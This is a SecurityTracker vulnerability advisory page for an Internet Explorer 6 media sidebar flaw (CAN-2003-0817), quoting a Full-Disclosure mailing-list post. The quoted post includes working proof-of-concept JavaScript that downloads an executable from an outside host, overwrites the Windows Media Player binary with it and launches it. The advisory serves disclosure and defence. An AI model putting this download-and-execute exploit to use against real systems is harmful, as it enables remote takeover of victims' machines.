SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE) Vendors:  Microsoft
Microsoft Internet Explorer Media Sidebar Flaw Lets Remote Users Execute Arbitrary Code on the System
SecurityTracker Alert ID:  1007689
CVE Reference:  CAN-2003-0817   (Links to External Site)
Updated:  Jan 20 2004
Original Entry Date:  Sep 12 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 6
Description:  A vulnerability was reported in Microsoft Internet Explorer (IE). A remote user can create HTML that, when loaded by the target user, will cause arbitrary code to be executed.

It is reported that a remote user can exploit a flaw in the media sidebar to cause IE to load a resource file in the "My Computer" zone and have it execute arbitrary code. According to the report, errors in loading media via the media sidebar are processed by the following file (in the local system zone):

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

A remote user can invoke other methods (including a cross-domain scripting flaw discovered by Liu Die Yu) to cause scripting code to be served by this page.

A demonstration exploit is provided at:

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
Impact:  A remote user can cause arbitrary code to be executed by the target user's browser (with the privileges of the target user).
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:  Access control error, State error
Underlying OS:  Windows (Any)
Reported By:  jelmer <jkuperus@planet.nl>
Message History:   None.

 Source Message Contents
Date:  Fri, 12 Sep 2003 00:31:41 +0200
From:  jelmer <jkuperus@planet.nl>
Subject:  [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code

 

Internet explorer 6 on windows XP allows exection of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.


TECHNICAL EXPLAINATION :

Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html

To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>


DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm


WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another browser
such as the
excellent mozilla firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC